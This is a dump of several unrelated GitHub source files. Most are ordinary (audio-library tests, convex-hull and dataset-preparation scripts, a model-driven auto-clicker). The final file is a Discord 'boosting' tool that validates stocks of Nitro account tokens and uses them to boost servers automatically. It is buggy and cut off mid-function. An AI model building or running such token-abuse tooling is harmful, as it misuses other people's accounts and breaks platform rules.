BitReader(fo)\n v = r.bits(i) << (64 - i) | r.bits(64 - i)\n self.assertEqual(v, ref)\n\n def test_read_too_much(self):\n r = BitReader(cBytesIO(b\"\"))\n self.assertEqual(r.bits(0), 0)\n self.assertRaises(BitReaderError, r.bits, 1)\n\n def test_skip(self):\n r = BitReader(cBytesIO(b\"\\xEF\"))\n r.skip(4)\n self.assertEqual(r.bits(4), 0xf)\n\n def test_skip_more(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\"))\n self.assertEqual(r.bits(4), 0xa)\n r.skip(8)\n self.assertEqual(r.bits(4), 0xd)\n self.assertRaises(BitReaderError, r.bits, 1)\n\n def test_skip_too_much(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\"))\n # aligned skips don't fail, but the following read will\n r.skip(32 + 8)\n self.assertRaises(BitReaderError, r.bits, 1)\n self.assertRaises(BitReaderError, r.skip, 1)\n\n def test_bytes(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\\xEF\"))\n self.assertEqual(r.bytes(2), b\"\\xAB\\xCD\")\n self.assertEqual(r.bytes(0), b\"\")\n\n def test_bytes_unaligned(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\\xEF\"))\n r.skip(4)\n self.assertEqual(r.bytes(2), b\"\\xBC\\xDE\")\n\n def test_get_position(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\"))\n self.assertEqual(r.get_position(), 0)\n r.bits(3)\n self.assertEqual(r.get_position(), 3)\n r.skip(9)\n self.assertEqual(r.get_position(), 3 + 9)\n r.align()\n self.assertEqual(r.get_position(), 16)\n\n def test_align(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\\xEF\"))\n r.skip(3)\n self.assertEqual(r.align(), 5)\n self.assertEqual(r.get_position(), 8)\n\n def test_is_aligned(self):\n r = BitReader(cBytesIO(b\"\\xAB\\xCD\\xEF\"))\n self.assertTrue(r.is_aligned())\n\n r.skip(1)\n self.assertFalse(r.is_aligned())\n r.skip(7)\n self.assertTrue(r.is_aligned())\n\n r.bits(7)\n self.assertFalse(r.is_aligned())\n r.bits(1)\n self.assertTrue(r.is_aligned())\n\n\nclass Tset_win32_unicode_argv(TestCase):\n\n def test_main(self):\n old_argv = sys.argv\n try:\n set_win32_unicode_argv()\n if os.name == \"nt\":\n self.assertTrue(isinstance(sys.argv[0], text_type))\n finally:\n sys.argv = old_argv\n","repo_name":"dhamaniasad/mutagen","sub_path":"tests/test__util.py","file_name":"test__util.py","file_ext":"py","file_size_in_byte":24490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35080296196","text":"\"\"\"Test script for finding tangents between two hulls.\"\"\"\n\nfrom ctypes import ArgumentError\nimport os\nfrom datetime import datetime\nfrom typing import List, Text\n\nimport matplotlib\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\n\nfrom point import Point\nimport util\nimport convex_hull\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string(\n \"left_hullfile\", None, \"The path to an input file containing x,y pairs of coordinates for the left hull.\")\n\n\nflags.DEFINE_string(\n \"right_hullfile\", None, \"The path to an input file containing x,y pairs of coordinates for the left hull.\")\n\nflags.DEFINE_enum(\"tangent\", \"upper\", [\n \"upper\", \"lower\"], \"Which of the tangents to find, \\\"upper\\\" or \\\"lower\\\".\")\n\nflags.DEFINE_bool(\n \"show_plot\", True, \"Whether or not to plot the associated tangent points.\")\n\n\ndef print_usage():\n \"\"\"Prints usage information for the tool.\"\"\"\n print(\"\"\"\nUsage: rightmost_point.py --left_hullfile=[hullfile] --right_hullfile=[hullfile]\"\"\")\n\n\ndef main(argv):\n del argv # unused\n\n left_hull = util.fetch_input_points(FLAGS.left_hullfile)\n right_hull = util.fetch_input_points(FLAGS.right_hullfile)\n\n l_point = max(left_hull, key=lambda p: p.x)\n r_point = min(right_hull, key=lambda p: p.x)\n center_x = l_point.x + ((r_point.x - l_point.x) / 2)\n l_index = left_hull.index(l_point)\n r_index = right_hull.index(r_point)\n\n if FLAGS.tangent == \"upper\":\n l_index, r_index = convex_hull.find_upper_tangent(\n left_hull, l_index, right_hull, r_index, center_x)\n elif FLAGS.tangent == \"lower\":\n l_index, r_index = convex_hull.find_lower_tangent(\n left_hull, l_index, right_hull, r_index, center_x)\n else:\n raise ArgumentError()\n\n l_point = left_hull[l_index]\n r_point = right_hull[r_index]\n if (FLAGS.show_plot):\n util.show_plot(hulls=[left_hull, right_hull],\n lines=[[l_point, r_point]],\n labels={l_point: \"l\", r_point: \"r\"})\n logging.info(f\"Left Point: {l_point} | Right Point: {r_point}\")\n\n\nif __name__ == \"__main__\":\n FLAGS.logtostderr = True\n flags.mark_flag_as_required('left_hullfile')\n flags.mark_flag_as_required('right_hullfile')\n\n matplotlib.use(\"TkAgg\")\n app.run(main)\n","repo_name":"zhavens/convex_hull","sub_path":"tools/find_tangent.py","file_name":"find_tangent.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74018546028","text":"'''\nUma empresa vende o mesmo produto para quatro diferentes estados. Cada estado\npossui uma taxa deferente de imposto sobre o produto (MG:7%; SP:12%; RJ:15%; MS:8%).\nFaça um programa em que o usuário entre com valor e o estado destino do produto\ne o Programa retorne o preço final do produto acrescido do imposto do estado em que ele será vendido.\nSe o estado digitado não for válido, mostrar uma mensagem de erro.\n'''\n\nvprod = float(input('Valor do produto: R$ '))\nestado = str(input('Estado de destino: ')).strip()[0:1].upper()\n\nif estado in 'MG':\n imposto = vprod * 7 / 100\n print(f'Preço final = R$ {vprod + imposto}')\nelif estado in 'SP':\n imposto = vprod * 12 / 100\n print(f'Preço final = R$ {vprod + imposto}')\nelif estado in 'RJ':\n imposto = vprod * 15 / 100\n print(f'Preço final = R$ {vprod + imposto}')\nelif estado in 'MS':\n imposto = vprod * 8 / 100\n print(f'Preço final = R$ {vprod + imposto}')\nelse:\n print('Erro!')\n","repo_name":"Leownhart/My_Course_of_python","sub_path":"Geek University/Seção 5/Exercicios/EX24.py","file_name":"EX24.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41669031628","text":"# coding=utf8\r\n# @Time : 2023/10/26 0:07\r\n# @Author : tk\r\n# @FileName: make_data\r\nimport json\r\nimport os.path\r\nfrom shutil import copyfile\r\nimport datasets\r\nfrom torchvision.datasets.coco import CocoDetection\r\nfrom pathlib import Path\r\n\r\nclass MyCocoDetection(CocoDetection):\r\n def _load_image(self, id: int) :\r\n path = self.coco.loadImgs(id)[0][\"file_name\"]\r\n return os.path.join(self.root, path)\r\n\r\n def __getitem__(self, idx):\r\n img, target = super(MyCocoDetection, self).__getitem__(idx)\r\n image_id = self.ids[idx]\r\n target = {'image_id': image_id, 'annotations': target}\r\n return img, target\r\n\r\n\r\ndef build(coco_path,image_set,outfile,limit_n=-1):\r\n root = coco_path\r\n assert root.exists(), f'provided COCO path {root} does not exist'\r\n mode = 'instances'\r\n PATHS = {\r\n \"train\": (root / \"train2017\", root / \"annotations\" / f'{mode}_train2017.json'),\r\n \"val\": (root / \"val2017\", root / \"annotations\" / f'{mode}_val2017.json'),\r\n }\r\n\r\n img_folder, ann_file = PATHS[image_set]\r\n dataset = MyCocoDetection(img_folder, ann_file)\r\n if limit_n < 0:\r\n limit_n = len(dataset)\r\n with open(outfile,mode='w',encoding='utf-8') as f:\r\n for i in range(min(len(dataset),limit_n)):\r\n path,labels = dataset[i]\r\n f.write(json.dumps({\r\n \"path\": path,\r\n \"labels\": labels\r\n },ensure_ascii=False) + '\\n')\r\n\r\n\r\n\r\n\r\n\r\ndata_dir = Path(\"/data/cv/data/coco\")\r\n\r\nbuild(data_dir,\"train\",\"train.json\",100)\r\n\r\nbuild(data_dir,\"val\",\"dev.json\",20)\r\n","repo_name":"ssbuild/detection_finetuning","sub_path":"data/make_data_sample.py","file_name":"make_data_sample.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25045878128","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 19 23:19:53 2023\n\n@author: betsa\n\"\"\"\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.compose import make_column_selector as selector\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import KFold\nfrom sklearn.impute import SimpleImputer\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n# **-fill the unknown with most frequent value in each column\ndef fill_missing_most_frequent(Data, col_name, missing_val, strategy_method): \n mostfreq_imputer = SimpleImputer(missing_values=missing_val,strategy=strategy_method)\n Data[col_name] = mostfreq_imputer .fit_transform(Data[col_name].values.reshape(-1,1))\n return Data\n\n# **- Convert time to categorical \ndef convert_time_category(Data):\n \n X_value = Data['Time']\n num_samples = np.shape (X_value)[0]\n newtime = np.zeros((num_samples,2))\n i=0\n for time in X_value:\n #print(time)\n t = time.split(':')\n hour = int (t[0])\n minute = int (t[1])\n if ((hour>=6) and (minute>=30)):\n if ((hour<=9) and (minute<=30)):\n newtime[i,0] = 1 #AM peak\n if ((hour>=15) and (minute>=30)):\n if ((hour<=18) and (minute<=30)):\n newtime[i,1] = 1 # PM Peak \n \n\n \n i = i+1\n \n \n Data ['AM_Peak'] = newtime[:,0].tolist() \n Data ['PM_Peak'] = newtime[:,1].tolist() \n \n\n# **- Convert Date to categorical \ndef convert_Date_category(Data):\n \n X_value = Data['Date']\n newDate = []\n i=0\n for Date in X_value: \n t = Date.split('/')\n if (t[1]=='01') or (t[1]=='1'):\n newDate.append('Jan')\n if (t[1]=='02') or (t[1] == '2'):\n newDate.append('Feb')\n if (t[1]=='03') or (t[1]=='3'):\n newDate.append('Mar')\n if (t[1]=='04') or (t[1]=='4'):\n newDate.append('Apr')\n if (t[1]=='05') or (t[1]=='5'):\n newDate.append('May')\n if (t[1]=='06') or (t[1]=='6'):\n newDate.append('Jun')\n if (t[1]=='07') or (t[1]=='7'):\n newDate.append('Jul')\n if (t[1]=='08') or (t[1]=='8'):\n newDate.append('Aug')\n if (t[1]=='09') or (t[1]=='9'):\n newDate.append('Sep')\n if (t[1]=='10'):\n newDate.append('Oct')\n if (t[1]=='11'):\n newDate.append('Nov')\n if (t[1]=='12'):\n newDate.append('Dec') \n \n Data['Date'] = newDate \n \n \n \n \n#------------------------------------------------------------------------------\n#------------------------------------------------------------------------------\n#------------------------------------------------------------------------------\n# 1- Read Data\nData = pd.read_csv('CrashMLB8_new_mine.csv')\nprint(\"------------Data information----------------\")\nprint (Data.info())\n\nAll_col_names = ['CodeAccide','LGA_NAME', 'Location', 'Date','Time',\n 'Type',\t\n 'DayWeek', 'Light',\t'TypeInters',\t'SpeedZone',\n 'AirCond', \t'VehiNum',\t'PersNum',\n 'PersNum1',\t'PersInj2Nu',\t'PersInj3Nu', 'PersKillNu',\n 'SEVERITY',\t'PersNoInjN']\n\n\n# 2- Drop unrelated colums and the duplicated column `\"CrashCount\"` and \"PersNum is the same\nData = Data.drop(columns=[\"SA2C2016\",\t\"SA2N2017\",\t\"SA1_20\",\t\"SA2_20\",\n \"PostCode\", \"months\",'DCA','Type'])\n\n# 3- Drop duplicated rows\nData = Data.drop_duplicates(subset = 'CodeAccide')\nprint(\"number of samples after drop duplicate =\", np.shape(Data['CodeAccide'])[0])\nprint ('Data set info after removing duplicates:')\nprint (Data.info())\n\n\n# 4- fill missing values by most common\nNewData = Data.copy() \nNewData = fill_missing_most_frequent(NewData, 'LGA_NAME', np.nan ,'most_frequent')\nNewData = fill_missing_most_frequent(NewData, 'Light', 'Unknown','most_frequent')\nNewData = fill_missing_most_frequent(NewData, 'TypeInters', 'Unknown','most_frequent')\nNewData = fill_missing_most_frequent(NewData, 'SpeedZone', 777,'most_frequent')\nNewData = fill_missing_most_frequent(NewData, 'SpeedZone', 888,'most_frequent')\nNewData = fill_missing_most_frequent(NewData, 'SpeedZone', 999,'most_frequent')\nNewData = fill_missing_most_frequent(NewData, 'AirCond', 'Not known','most_frequent')\n\nprint(\"-----------New Data set info--------------------\")\nprint (NewData.info())\n\n\n\n\n# 5- set time and date\nconvert_Date_category(NewData)\nprint('unique value Date:', np.unique(NewData['Date']))\n\n\nconvert_time_category(NewData)\nNewData = NewData.drop(columns=['Time'])\nprint (\"-------------------New dataset info after inserting time features---------------------\")\nprint (NewData.info())\n\n# 6- Select categorical and numeric column\nnumerical_columns_selector = selector(dtype_exclude=object)\ncategorical_columns_selector = selector(dtype_include=object)\n\nnumerical_columns_name = numerical_columns_selector(NewData)\ncategorical_columns_name = categorical_columns_selector(NewData)\n\n# 7- ColumnTransformer \ncategorical_features = NewData[categorical_columns_name[1:8]] #1 :10\nonehot_encoder = OneHotEncoder(sparse=False, handle_unknown= 'ignore')\ncategorical_transformed_features = onehot_encoder.fit_transform(categorical_features)\nmap_categorical_name=onehot_encoder.get_feature_names_out()\n\n# 8-Create a new Dataset with new features\nnumerical_features = NewData[numerical_columns_name]\nnumerical_features = np.array(numerical_features)\nlabels = NewData[\"SEVERITY\"] \nlabels = labels.tolist()\nAll_features = np.concatenate((categorical_transformed_features,numerical_features), axis= 1)\nfeatures_name= map_categorical_name.tolist() + numerical_columns_name \nNewData1 = pd.DataFrame(data = All_features, \n index = range(np.shape(All_features)[0]),\n columns = features_name)\n\nNewData1['SEVERITY'] = labels\ntemp = NewData['CodeAccide'].tolist()\nNewData1['CodeAccide'] = temp\nprint (\"========================Created Dataset info=======================================\") \nprint(NewData1.info())\n\n# 9-Write in the csv file\nNewData1.to_csv('New_Dataset2.csv', index = False)\n\n\n \n","repo_name":"Betsabeh/Predicting-Injury-Risk-","sub_path":"Crash_RandomForest/Create_newDataset.py","file_name":"Create_newDataset.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31599393220","text":"import os\nfrom cv2 import imwrite\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nfrom tensorflow import keras\nimport tensorflow as tf\nimport numpy as np \nfrom pyautogui import screenshot,click\nimport keyboard\nfrom time import sleep\n#from datetime import datetime\nmodel = tf.keras.models.load_model('./hdf5/model2.h5')\nc = 36\ndef predict():\n global c\n img = (np.array(screenshot()))[820:1020,1400:1600]\n img_array = tf.expand_dims(img, 0)\n predictions = (model.predict(img_array))[0][0]\n score = 1 if predictions > 0.5 else 0\n if score:\n c+=1\n imwrite(\"./data/1/image_{}.png\".format(c), img)\n \n\n return score\n\nstarted = False\nprint('***Ready***')\ntry:\n while True:\n if started:\n #sleep(0.01)\n #t1 = datetime.now()\n score = predict()\n if score:\n click(x=1000,y=1060)\n #t2 = datetime.now()\n #t = t2-t1\n #print(t.microseconds)\n elif keyboard.is_pressed('space'):\n started = True\n print('***started***')\n\n if keyboard.is_pressed('tab'):\n print('***over***')\n started = False\n break\n elif keyboard.is_pressed('p'):\n print('***Paused***')\n started = False\n \nexcept KeyboardInterrupt:\n print('Keyboard Interrupt')\n","repo_name":"vylhart/Project-Budweiser","sub_path":"runModel.py","file_name":"runModel.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32549525370","text":"'''This is to get the operations performed while creating the required dataframe\nAlso takes care of the percentage-wise dataset which is demanded\n'''\n\n'''Library imports'''\nimport pandas as pd\nfrom scipy.io import loadmat\nfrom tqdm import tqdm\nimport glob\nimport os\n\n\nclass images_folder_path:\n\n ''' class to set the folder-path of images, given the data_type that we deal with'''\n\n def __init__(self, raw_dataset_path, data_type):\n self.raw_dataset_path = raw_dataset_path\n self.data_type = data_type\n def wider_face_way(self):\n '''images folder path as required by yolov5'''\n self.folders_path = os.path.join(self.raw_dataset_path, self.data_type,'images')\n\n\nclass dframe_imagepaths:\n\n '''\n arrangement : folder => {folder1, fodler2, folder3, folder4,....}\n every folder contains different differnt images\n folder1 = {img1, img2, img3, ....}\n Class to create dataframe of foldername and imagename given the path of that folder\n '''\n\n def __init__(self, folders_path_images):\n self.df = pd.DataFrame(columns = ['folder_name', 'image_name'])\n self.folders_path_images = folders_path_images\n def images_based_df(self):\n '''formation of df based on folder and images stored inside the storage'''\n for folder in tqdm(os.listdir(self.folders_path_images)):\n for image in os.listdir(os.path.join(self.folders_path_images,folder)):\n self.df.loc[len(self.df.index)] = [folder, image]\n\nclass labels_folder_path:\n\n '''class to set the folder path of labels, given the data_type that we deal with'''\n\n def __init__(self, raw_dataset_path, data_type):\n self.raw_dataset_path = raw_dataset_path\n self.data_type = data_type\n def wider_face_way(self):\n '''Labels fodler path as required by yolov5'''\n self.folders_path = os.path.join(self.raw_dataset_path, self.data_type,'labels')\n\nclass dframe_labels_train_and_val:\n\n '''Getting the labels for train and validation arranged inside the dataframe'''\n\n def __init__(self, folders_path_labels):\n self.df = pd.DataFrame(columns = ['image_name', 'bbox'])\n self.folders_path_labels = folders_path_labels\n def labels_based_df_for_matfiles(self):\n '''To create image and label specific dataframe\n loading the labels from .mat file'''\n for file in glob.glob(os.path.join(self.folders_path_labels,\"*.mat\")):\n annots = loadmat(file)\n \n '''formation of df based on label annotaions inside the .mat labels file'''\n for f, folder in enumerate(tqdm(annots['file_list'])):\n for im, image in enumerate(folder[0]):\n boxes_per_image=[]\n for box in annots['face_bbx_list'][f][0][im][0]:\n boxes_per_image.append(box)\n self.df.loc[len(self.df.index)] = [image[0][0]+'.jpg', boxes_per_image]\n\nclass images_labels_merged_df:\n\n '''get the merged dataframe of [folder_path, image_name] and [image_name, bbox]'''\n\n def __init__(self, df1_sample, df2_sample):\n self.df1_sample = df1_sample\n self.df2_sample = df2_sample\n def merge_df(self):\n '''Merge of this : [folder_path, image_name] and [image_name, bbox]'''\n self.df_merged = self.df1_sample.merge(self.df2_sample, on='image_name', how = 'inner')\n\n\nclass image_folder_images_as_grouped:\n \n '''get the dataframe as the groups of folder_name then as the groups of image_name\n this is the required df for all dataframes'''\n\n def __init__(self, df_merged, DF_FRAC):\n self.groups = df_merged.groupby(['folder_name', 'image_name'])\n self.df_frac = DF_FRAC\n def grouping(self):\n '''Groups are all unique and folder name and then image name are all uniques, so we get full dataframe'''\n self.df_full = self.groups.first()\n \n '''getting the fraction dataframe as demanded'''\n self.df_required_sample = self.df_full.sample(frac= self.df_frac, random_state = 1)\n\n\n\nclass three_dataframe_preparation:\n \n '''To get all the 3 required dataframes that too based on percentage of dataset which is required.'''\n \n def __init__(self, data_type_train, train_frac, data_type_validation, validation_frac, data_type_test, test_frac, raw_dataset_path):\n self.data_type_train = data_type_train\n self.train_frac = train_frac\n self.data_type_validation = data_type_validation\n self.validation_frac = validation_frac\n self.data_type_test = data_type_test\n self.test_frac = test_frac\n self.raw_dataset_path = raw_dataset_path\n\n def dataframe_preparation(self, dtype, frac):\n '''\n Dataframe perparation begins with the mentioned dtype and fraction of dataet required\n\n - dataframe image folders path\n - dataframe images paths\n - image-folder-images-grouped(for train-val-test)\n\n - dataframe labels folder path\n - dataframe labels(name same as image) | We get the labels from .mat files\n - labels grouped(for train-val)\n\n - grouping and merging the images and labels info\n '''\n folders_path_images = images_folder_path(self.raw_dataset_path, dtype)\n folders_path_images.wider_face_way()\n df1 = dframe_imagepaths(folders_path_images.folders_path)\n df1.images_based_df()\n\n if dtype == 'test':\n df_grouped = image_folder_images_as_grouped(df1.df, frac)\n df_grouped.grouping()\n return df_grouped.df_required_sample\n \n \n else:\n folders_path_labels = labels_folder_path(self.raw_dataset_path, dtype)\n folders_path_labels.wider_face_way()\n df2 = dframe_labels_train_and_val(folders_path_labels.folders_path)\n df2.labels_based_df_for_matfiles()\n\n img_lbl_df = images_labels_merged_df(df1.df, df2.df)\n img_lbl_df.merge_df()\n\n df_grouped = image_folder_images_as_grouped(img_lbl_df.df_merged, frac)\n df_grouped.grouping()\n return df_grouped.df_required_sample\n\n def get_train_test_val(self):\n '''Getting the required train, val and test dataframe'''\n self.train = self.dataframe_preparation(self.data_type_train, self.train_frac)\n self.validation = self.dataframe_preparation(self.data_type_validation, self.validation_frac)\n self.test = self.dataframe_preparation(self.data_type_test, self.test_frac)\n\n","repo_name":"vishalw-iitk/Widerface_Yolov5","sub_path":"Data_preparation/df_percent.py","file_name":"df_percent.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"11118042513","text":"import colorama, httpx, base64, sys, time, os, threading\r\nfrom pathlib import Path\r\nfrom colorama import Fore, init, Style, Back\r\nimport boostingshit\r\nfrom boostingshit import thread_boost, boost_server\r\n\r\ndef cls():\r\n os.system('cls' if os.name=='nt' else 'clear')\r\n\r\ndef getinviteCode(invite_input):\r\n if \"discord.gg\" not in invite_input:\r\n return invite_input\r\n if \"discord.gg\" in invite_input:\r\n invite = invite_input.split(\"discord.gg/\")[1]\r\n return invite\r\n if \"https://discord.gg\" in invite_input:\r\n invite = invite_input.split(\"https://discord.gg/\")[1]\r\n return invite\r\n \r\ndef inputNumber(message):\r\n while True:\r\n try:\r\n userInput = int(input(message))\r\n except ValueError:\r\n print(Fore.RED + \"This value cannot be a string!\" + Fore.WHITE)\r\n continue\r\n else:\r\n return userInput\r\n break\r\n\r\ndef mainmenu():\r\n printwatermark()\r\n home = (Fore.CYAN + f'''\r\n 1. Boost Server\r\n 2. View Stock\r\n 3. Check Nitro Tokens\r\n 4. Exit\r\n''' + Fore.WHITE)\r\n for char in home:\r\n time.sleep(0.00009)\r\n sys.stdout.write(char)\r\n sys.stdout.flush()\r\n choices = input()\r\n if(input == \"1\"):\r\n typeofboost = inputNumber(Fore.CYAN + \"Duration of Boost [90 or 30 days]: \" + Fore.WHITE)\r\n while typeofboost != 90 and typeofboost != 30:\r\n print(Fore.RED + \"Duration can either be 30 days or 90 days\" + Fore.WHITE)\r\n typeofboost = inputNumber(Fore.CYAN + \"Duration of Boost [90 or 30 days]: \" + Fore.WHITE)\r\n if typeofboost == 90:\r\n file = \"3m_tokens.txt\"\r\n if typeofboost == 30:\r\n file = \"1m_tokens.txt\"\r\n \r\n if checkEmpty(file) == True:\r\n print()\r\n print(Fore.RED + \"No Stock\" + Fore.WHITE)\r\n print()\r\n input(\"Press Enter To Continue...\")\r\n cls()\r\n\r\n mainmenu()\r\n\r\n \r\n invite_input = input(Fore.CYAN + \"Permanent Invite Link to the server you want to boost [https://discord.gg/[invite_code]]: \" + Fore.WHITE)\r\n while invite_input.isdigit == True:\r\n print(Fore.RED + \"Invite Link cannot be a number\" + Fore.WHITE)\r\n invite_input = input(Fore.CYAN + \"Permanent Invite Link to the server you want to boost [https://discord.gg/[invite_code]]: \" + Fore.WHITE)\r\n\r\n invite = getinviteCode(invite_input)\r\n valid_invite = validateInvite(invite)\r\n while valid_invite == False:\r\n print(Fore.RED + f\"Invalid Invite Code, {invite}\")\r\n invite_input = input(Fore.CYAN + \"Permanent Invite Link to the server you want to boost [https://discord.gg/[invite_code]]: \" + Fore.WHITE)\r\n invite = getinviteCode(invite_input)\r\n valid_invite = validateInvite(invite)\r\n\r\n\r\n amount_input = inputNumber(Fore.CYAN + \"Amount of Boosts: \" + Fore.WHITE)\r\n while amount_input % 2 != 0:\r\n print(Fore.RED + \"Amount of Boosts must be even.\" + Fore.WHITE)\r\n amount_input = inputNumber(Fore.CYAN + \"Amount of Boosts: \" + Fore.WHITE)\r\n \r\n if amount_input/2 > len(open(file , encoding='utf-8').read().splitlines()):\r\n print()\r\n print(Fore.RED + \"Not Enought Stock\" + Fore.WHITE)\r\n print()\r\n input(\"Press Enter To Continue...\")\r\n cls()\r\n\r\n mainmenu()\r\n\r\n\r\n amount = amount_input\r\n\r\n EXP = True\r\n if typeofboost == 90:\r\n EXP = False\r\n\r\n threads = []\r\n no_working = False\r\n r = 0\r\n numTokens = int(amount/2)\r\n all_tokens = get_all_tokens(file)\r\n tokens_to_use = []\r\n print(Fore.GREEN + \"Looking for working tokens\" + Fore.WHITE)\r\n while len(tokens_to_use) != numTokens:\r\n try:\r\n token = all_tokens[r]\r\n if checktoken(token, file) == True:\r\n tokens_to_use.append(token)\r\n r += 1\r\n except IndexError:\r\n print(Fore.RED + \"Not Enough Working Tokens in Stock\" + Fore.WHITE)\r\n no_working = True\r\n break\r\n \r\n if no_working == True:\r\n input(\"Press Enter To Continue...\")\r\n cls()\r\n \r\n mainmenu()\r\n else:\r\n time.sleep(2)\r\n cls()\r\n start = time.time()\r\n print(Fore.GREEN + \"Starting Boosts\" + Fore.WHITE)\r\n tokens_to_use = all_tokens\r\n for i in range(numTokens):\r\n token = tokens_to_use[i]\r\n t = threading.Thread(target=thread_boost, args=(invite, amount, EXP, token))\r\n t.daemon = True\r\n threads.append(t)\r\n\r\n for i in range(numTokens):\r\n threads[i].start()\r\n \r\n for i in range(numTokens):\r\n threads[i].join()\r\n \r\n end = time.time()\r\n time_taken = round(end-start)\r\n print(Fore.GREEN + f\"Successfully boosted discord.gg/{invite}, {amount} times in {time_taken} seconds.\")\r\n \r\n\r\n print()\r\n input(\"Press Enter To Continue...\")\r\n cls()\r\n \r\n mainmenu()\r\n elif(input == \"2\"):\r\n stock()\r\n elif(input == \"3\"):\r\n nitrochecker()\r\n elif(input == \"4\"):\r\n print(Fore.RED + \"Exiting!\")\r\n time.sleep(1500)\r\n sys.exit()\r\n else:\r\n print(\"invalid option!\")\r\n time.sleep(1750)\r\n cls()\r\n mainmenu()\r\ndef stock():\r\n print(Fore.GREEN + f\"3 Months Nitro Tokens Stock: {len(open('3m_tokens.txt', encoding='utf-8').read().splitlines())}\")\r\n print(f\"3 Months Boost Stock: {len(open('3m_tokens.txt', encoding='utf-8').read().splitlines())*2}\")\r\n print()\r\n print(f\"1 Month Nitro Tokens Stock: {len(open('1m_tokens.txt', encoding='utf-8').read().splitlines())}\")\r\n print(f\"1 Month Boosts Stock: {len(open('1m_tokens.txt', encoding='utf-8').read().splitlines())*2}\" + Fore.WHITE)\r\n\r\ndef validateInvite(invite):\r\n if '{\"message\": \"Unknown Invite\", \"code\": 10006}' in httpx.get(f\"https://discord.com/api/v9/invites/{invite}\").text:\r\n return False\r\n else:\r\n return True\r\ndef get_all_tokens(filename):\r\n all_tokens = []\r\n with open(filename, 'r') as f:\r\n for line in f.readlines():\r\n token = line.strip()\r\n token = find_token(token)\r\n if token != None:\r\n all_tokens.append(token)\r\n\r\n return all_tokens\r\n\r\ndef nitrochecker():\r\n\r\n three_m_working = 0\r\n one_m_working = 0\r\n\r\n three_m_used = 0\r\n one_m_used = 0\r\n\r\n three_m_nonitro = 0\r\n one_m_nonitro = 0\r\n\r\n three_m_invalid = 0\r\n one_m_invalid = 0\r\n\r\n three_m_locked = 0\r\n one_m_locked = 0\r\n three_m_tokens = get_all_tokens(\"input/3m_tokens.txt\")\r\n one_m_tokens = get_all_tokens(\"input/1m_tokens.txt\")\r\n print(\"Checking 3 Months Nitro Tokens\")\r\n\r\n if checkEmpty(\"input/3m_tokens.txt\"):\r\n print(Fore.RED + \"No Stock To Check\" + Fore.WHITE)\r\n \r\n else:\r\n\r\n for token in three_m_tokens: \r\n file = \"input/3m_tokens.txt\"\r\n s, headers = get_headers(token)\r\n profile = validate_token(s, headers)\r\n\r\n if profile != False:\r\n boost_data = s.get(f\"https://discord.com/api/v9/users/@me/guilds/premium/subscription-slots\", headers={'Authorization': token})\r\n\r\n if boost_data.status_code == 403:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [LOCKED]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n three_m_locked += 1\r\n if len(boost_data.json()) != 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\r\n if boost_data.json()[0]['cooldown_ends_at'] != None:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [USED]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n three_m_used += 1\r\n if len(boost_data.json()) == 0:\r\n removeToken(token, file)\r\n print(f\"{Fore.RED} ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [NO NITRO]\" + Fore.WHITE)\r\n three_m_nonitro += 1\r\n else:\r\n if len(boost_data.json()) != 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\r\n if boost_data.json()[0]['cooldown_ends_at'] == None:\r\n\r\n print(f\"{Fore.GREEN} ✓ {Fore.WHITE}{token} - {profile}{Fore.GREEN} [WORKING]\" + Fore.WHITE)\r\n three_m_working += 1\r\n else:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token}{Fore.RED} [INVALID]\" + Fore.WHITE)\r\n removeToken(token, file)\r\n three_m_invalid += 1\r\n print()\r\n print(\"Checking 1 Month Nitro Tokens\")\r\n if checkEmpty(\"input/1m_tokens.txt\"):\r\n print(Fore.RED + \"No Stock To Check\" + Fore.WHITE) \r\n else:\r\n for token in one_m_tokens: \r\n file = \"input/1m_tokens.txt\"\r\n s, headers = get_headers(token)\r\n profile = validate_token(s, headers)\r\n if profile != False:\r\n boost_data = s.get(f\"https://discord.com/api/v9/users/@me/guilds/premium/subscription-slots\", headers={'Authorization': token})\r\n\r\n if boost_data.status_code == 403:\r\n print(Fore.RED + f\" ✗ {Fore.WHITE}{token} - {profile}{Fore.RED} [LOCKED]\" + Fore.WHITE)\r\n removeToken(token, 